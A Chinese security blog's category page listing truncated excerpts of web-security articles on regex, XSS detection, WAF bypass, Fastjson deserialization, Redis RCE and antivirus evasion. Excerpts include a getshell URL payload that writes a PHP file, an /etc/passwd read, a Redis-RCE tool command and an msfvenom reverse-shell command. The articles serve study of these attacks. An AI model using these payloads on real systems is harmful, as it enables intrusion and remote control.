分类 web安全 下的文章

正则小笔记1.前言平常用到的正则小笔记2.内容字符代表:. 任意一个字符s 一个空白符 S 一个非空白分w 一个数字,字母和下划线 W 一个非..d 一个数字 D 一个非数字限制:零次或者多次至少一次或者一次以上(注意这两个区别)? 0个或者1个| 或[] []里面任意字符一个{} 修饰出现的次数() 一个组,被group捕获(?:) 不为一个组.?和.+? 是非贪婪匹配 , .为贪.......

http://127.0.0.1/?a=display&templateFile=/etc/passwdGetshellhttp://127.0.0.1/?a=fetch&tem%20...%20%27%27&content=%3Cphp%3Efile_put_contents(%27111.php%27,%27%3C?php%20phpinfo();%20?%3E%.......

前言  设置代理收集流量是很常见的漏洞扫描方法。很早之前猪猪侠就有了的思路。不得不说这是一种流量补充好方法,可以拿到爬虫爬不到的点。  我一开始用的代理是mitmproxy1.8,代理同时就进行去重复和入数据库处理。这样出现的问题很明显:  1.代理速度超级慢  2.低版本的mitmproxy老是出现连接断开和证书错误的各种bug解决升级mitmproxy  首先升级mitmprox.......

漏洞说明Axessh是一款windows下的ssh工具,使用后会开启ssh 22端口,并开启wsshed.exe服务,当wsshed.exe在接收字符串时,会调用BIGNUM相关函数进行处理,但对于BIGNUM的结构体没有进行赋初值,导致空指针引用引发拒绝服务漏洞,下面对此漏洞进行详细分析。软件下载: https://www.exploit-db.com/apps/12d8cee31.......

一)前言静态xss检测是啥?静态xss检测相对区别于基于webkit的xss检测。 完成依靠输出点情况的检测来判断是否存在xss漏洞。那么xss漏洞用webkit(http://blog.wils0n.cn/archives/18/)来检查就好了,为什么还要加上静态xss检测呢?? 个人认为是因为基于webkit的xss检测有的时候可能检查不到:1.script标签内多重闭合的情.......

前言本文主要讨论下 文件上传和WAF的功与防。测试环境均为nginx/1.10.3PHP 5.5.34有些特性和 语言及webserver有关,有问题的地方,欢迎大家指正。文件上传的特征先来了解下文件上传的特征,抓包看看这段文件上传代码的HTTP请求。upload.php<?php if(isset($_POST['submit_x'])){ $upfile = $_.......

前言前几天护网杯比赛中,有一题关于Fastjson反序列化。有人在问为什么没有利用成功,而且比赛结束后的writeup也是用的JdbcRowSetImplEXP,所以简单看看原因。easy_web.png利用写了一份fastjson反序列化漏洞的漏洞代码,简单描述下如何利用。JdbcRowSetImpl先说针对JdbcRowSetImpl的漏洞利用。post提交:{"@ty.......

远程代码执行redis4和redis5来自https://github.com/jas502n/Redis-RCE python代码[[email protected] script]# git clone https://github.com/jas502n/Redis-RCE.git 安装redis5.0 python redis-rce.py -r 127.0.0.1 -p 6379 -.......

无意中看到go 的远程dll 过杀软的,然后就发现luan大佬的博客有一篇文章 python 的调用shellcode 的方式测试了一下原文地址:http://lu4n.com/metasploit-payload-bypass-av-note/└──╼ #msfvenom -p windows/meterpreter/reverse_tcp LPORT=4444 LHOST=192.......

连接: redis-cli -h host -p port -n db需要知道的:①Redis 基本操作,信息以键值对应的关系储存set 写入数据get 查看数据keys* 查看所有键值select db 相当于关系型数据库中的多个库,选择其中之一(Redis中的DB是相互独立存在的,所以可以出现重复的key)FLUSHALL 清空数据10.211.55.8:6379> set.......